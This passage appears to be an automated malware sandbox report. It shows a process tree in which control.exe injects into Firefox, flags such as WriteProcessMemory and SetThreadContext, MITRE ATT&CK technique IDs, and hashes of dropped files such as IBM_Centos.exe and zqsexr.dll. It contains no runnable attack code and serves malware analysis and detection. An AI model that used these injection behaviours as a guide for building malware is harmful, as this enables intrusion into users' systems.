  PID:936
- C:\Windows\SysWOW64\control.exe
  "C:\Windows\SysWOW64\control.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:3784
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3784 -s 144
      4⤵
      Program crash
      PID:3372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 3784 -ip 3784
1⤵
PID:4952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PowErsHEll.Exe.log

Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
97a97d48dd68c7bffdb086f5fb42b060

SHA1
4c4e2facf764ea8681738d710a0ad3423d4c8092

SHA256
c26de434aa6bd2cb01cbc5ebd4222ef929e9f2ad8b32dbb371615b8b5cbc3d14

SHA512
5e6e39271555804fccbc1069474c87789a89974ab15211e2f64bfe13bf40e50314f8426a6093038f67dddf0266f4bf0b8f9797314808b133a93993b9757ac986

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe

Filesize
254KB

MD5
2bdd38681778a2be9d40177c6f8a3319

SHA1
af19e478cb32a12d777d7f25ad28868d14c5ec88

SHA256
741d19e0d36879bfe434d667669315cf244fc0b31813a6f81deba7c6bb3d6fb7

SHA512
5f6d60e363d58d8ea5cd8bdfad0c5ef9726cc3719ef9291827312915e4e254a4e6df0294044e3f78e2160e7d151936afdc4e2a6df09928a6d026fea46d023bd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe

Filesize
254KB

MD5
2bdd38681778a2be9d40177c6f8a3319

SHA1
af19e478cb32a12d777d7f25ad28868d14c5ec88

SHA256
741d19e0d36879bfe434d667669315cf244fc0b31813a6f81deba7c6bb3d6fb7

SHA512
5f6d60e363d58d8ea5cd8bdfad0c5ef9726cc3719ef9291827312915e4e254a4e6df0294044e3f78e2160e7d151936afdc4e2a6df09928a6d026fea46d023bd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe

Filesize
254KB

MD5
2bdd38681778a2be9d40177c6f8a3319

SHA1
af19e478cb32a12d777d7f25ad28868d14c5ec88

SHA256
741d19e0d36879bfe434d667669315cf244fc0b31813a6f81deba7c6bb3d6fb7

SHA512
5f6d60e363d58d8ea5cd8bdfad0c5ef9726cc3719ef9291827312915e4e254a4e6df0294044e3f78e2160e7d151936afdc4e2a6df09928a6d026fea46d023bd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe

Filesize
254KB

MD5
2bdd38681778a2be9d40177c6f8a3319

SHA1
af19e478cb32a12d777d7f25ad28868d14c5ec88

SHA256
741d19e0d36879bfe434d667669315cf244fc0b31813a6f81deba7c6bb3d6fb7

SHA512
5f6d60e363d58d8ea5cd8bdfad0c5ef9726cc3719ef9291827312915e4e254a4e6df0294044e3f78e2160e7d151936afdc4e2a6df09928a6d026fea46d023bd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0r3tn1g.lew.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nskDE0E.tmp\zqsexr.dll

Filesize
11KB

MD5
1ab65a4fc6b47ce4ee3c3a2bc1ba91a5

SHA1
c205dcb78b7b150cb52d075eab3f5aa1d859c07c

SHA256
40681937c243262b919b7c6c20a55102d327c17afacfc55345e98ee124ba4dfe

SHA512
670d1045ecf0ad78546bad8dd1e7c49f8029e30c6cba922fa948373ee6ff16da8ffe09f2a646f9ed5b23c77f07eafc1a669782aa38868dc21214754eccfdebd1

Download Submit
memory/1056-162-0x0000000071870000-0x0000000072020000-memory.dmp

Filesize
7.7MB

Download
memory/1056-137-0x0000000005520000-0x0000000005542000-memory.dmp

Filesize
136KB

Download
memory/1056-134-0x0000000002A70000-0x0000000002A80000-memory.dmp

Filesize
64KB

Download
memory/1056-184-0x0000000002A70000-0x0000000002A80000-memory.dmp

Filesize
64KB

Download
memory/1056-149-0x00000000063F0000-0x000000000640E000-memory.dmp

Filesize
120KB

Download
memory/1056-135-0x0000000002AE0000-0x0000000002B16000-memory.dmp

Filesize
216KB

Download
memory/1056-133-0x0000000071870000-0x0000000072020000-memory.dmp

Filesize
7.7MB

Download
memory/1056-139-0x0000000005DE0000-0x0000000005E46000-memory.dmp

Filesize
408KB

Download
memory/1056-167-0x0000000002A70000-0x0000000002A80000-memory.dmp

Filesize
64KB

Download
memory/1056-136-0x00000000055E0000-0x0000000005C08000-memory.dmp

Filesize
6.2MB

Download
memory/1056-193-0x0000000071870000-0x0000000072020000-memory.dmp

Filesize
7.7MB

Download
memory/1056-138-0x0000000005D00000-0x0000000005D66000-memory.dmp

Filesize
408KB

Download
memory/1772-207-0x0000000004700000-0x00000000047EF000-memory.dmp

Filesize
956KB

Download
memory/1772-199-0x0000000004700000-0x00000000047EF000-memory.dmp

Filesize
956KB

Download
memory/1772-212-0x0000000006EF0000-0x0000000006FE3000-memory.dmp

Filesize
972KB

Download
memory/1772-209-0x0000000006EF0000-0x0000000006FE3000-memory.dmp

Filesize
972KB

Download
memory/1772-210-0x0000000006EF0000-0x0000000006FE3000-memory.dmp

Filesize
972KB

Download
memory/2516-194-0x000000006E030000-0x000000006E036000-memory.dmp

Filesize
24KB

Download
memory/3688-182-0x0000000071870000-0x0000000072020000-memory.dmp

Filesize
7.7MB

Download
memory/3688-150-0x0000000071870000-0x0000000072020000-memory.dmp

Filesize
7.7MB

Download
memory/3688-169-0x0000000007310000-0x0000000007332000-memory.dmp

Filesize
136KB

Download
memory/3688-168-0x0000000007380000-0x0000000007416000-memory.dmp

Filesize
600KB

Download
memory/3688-163-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3688-165-0x0000000006220000-0x000000000623A000-memory.dmp

Filesize
104KB

Download
memory/3688-152-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3688-151-0x00000000026D0000-0x00000000026E0000-memory.dmp

Filesize
64KB

Download
memory/3688-164-0x0000000007520000-0x0000000007B9A000-memory.dmp

Filesize
6.5MB

Download
memory/3688-170-0x0000000008150000-0x00000000086F4000-memory.dmp

Filesize
5.6MB

Download
memory/4644-195-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/4644-198-0x0000000000BE0000-0x0000000000F2A000-memory.dmp

Filesize
3.3MB

Download
memory/4644-203-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/4644-197-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/5116-200-0x0000000000EC0000-0x0000000000EE7000-memory.dmp

Filesize
156KB

Download
memory/5116-206-0x0000000000C20000-0x0000000000C4D000-memory.dmp

Filesize
180KB

Download
memory/5116-205-0x0000000002C30000-0x0000000002F7A000-memory.dmp

Filesize
3.3MB

Download
memory/5116-202-0x0000000000C20000-0x0000000000C4D000-memory.dmp

Filesize
180KB

Download
memory/5116-201-0x0000000000EC0000-0x0000000000EE7000-memory.dmp

Filesize
156KB

Download
memory/5116-219-0x00000000029D0000-0x0000000002A5F000-memory.dmp

Filesize
572KB

Download